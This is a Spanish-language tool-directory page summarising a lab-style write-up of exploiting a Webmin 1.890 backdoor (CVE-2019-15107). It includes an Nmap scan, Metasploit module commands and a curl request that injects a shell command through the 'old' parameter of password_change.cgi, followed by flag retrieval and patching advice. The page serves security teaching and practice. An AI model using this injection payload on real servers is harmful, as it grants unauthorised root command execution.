Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Project-Exploitation-of-Webmin-Authentication-Vulnerability — Objetivo de la investigación: Realizar un análisis exhaustivo y la explotación exitosa de una vulnerabilidad de Ejecución Remota de Código (RCE) en Webmin versión 1.890 (CVE-2019-15107), obteniendo finalmente el control total del sistema objetivo. | Kitploit
Herramientas/GitHubGitHub/artemcyberlab/project-exploitation-of-webmin-authentication-vulnerability
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubartemcyberlab/project-exploitation-of-webmin-authentication-vulnerability

Project-Exploitation-of-Webmin-Authentication-Vulnerability

Objetivo de la investigación: Realizar un análisis exhaustivo y la explotación exitosa de una vulnerabilidad de Ejecución Remota de Código (RCE) en Webmin versión 1.890 (CVE-2019-15107), obteniendo finalmente el control total del sistema objetivo.

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Objetivo de la investigación: Realizar un análisis exhaustivo y una explotación exitosa de una vulnerabilidad de Ejecución Remota de Código (RCE) en Webmin versión 1.890 (CVE-2019-15107), obteniendo finalmente el control total del sistema objetivo.

Metodología:

Reconocimiento inicial:

Escaneo de red realizado con Nmap:

root@kitploit:~
nmap -sV -sC -A -p- 10.201.105.185

Se identificó el servicio Webmin 1.890 ejecutándose en el puerto 10000

Análisis de vulnerabilidad:

Se investigó el mecanismo de la vulnerabilidad en password_change.cgi

Se confirmó la posibilidad de ejecución de comandos arbitrarios sin autenticación

Explotación:

Se implementaron dos vectores de ataque:

Usando Metasploit Framework:

root@kitploit:~
use exploit/linux/http/webmin_backdoor
set RHOSTS 10.201.105.185
set LHOST tun0
exploit

Explotación manual mediante curl:

root@kitploit:~
curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test"

Post-Explotación:

Se obtuvo un shell root interactivo

Se realizó un análisis del sistema de archivos

Se descubrieron archivos de banderas:

root@kitploit:~
/home/dark/user.txt
/root/root.txt

Hallazgos:

Se explotó exitosamente la vulnerabilidad CVE-2019-15107

Se obtuvieron privilegios root completos en el sistema

Se demostró la importancia crítica de las actualizaciones de software oportunas

Conclusiones técnicas:

La vulnerabilidad permite la ejecución de comandos arbitrarios mediante la inyección del parámetro "old"

La falta de comprobaciones de autenticación hace que esto sea particularmente peligroso

La versión 1.890 contiene una puerta trasera parcheada en versiones posteriores

Recomendaciones de seguridad:

Actualización inmediata a la versión actual de Webmin

Restringir el acceso al panel de administración por IP

Auditorías de seguridad periódicas de aplicaciones web

Direcciones de investigación adicionales:

Análisis de otras vulnerabilidades de Webmin

Desarrollo de un exploit personalizado sin Metasploit

Investigación de técnicas de persistencia en sistemas comprometidos

Este estudio de caso demuestra la importancia crítica de las actualizaciones oportunas del sistema y la necesidad de una monitorización continua de vulnerabilidades en el software implementado. La investigación proporciona información práctica sobre técnicas modernas de explotación de aplicaciones web, al mismo tiempo que enfatiza los principios fundamentales de seguridad.

Descargar herramienta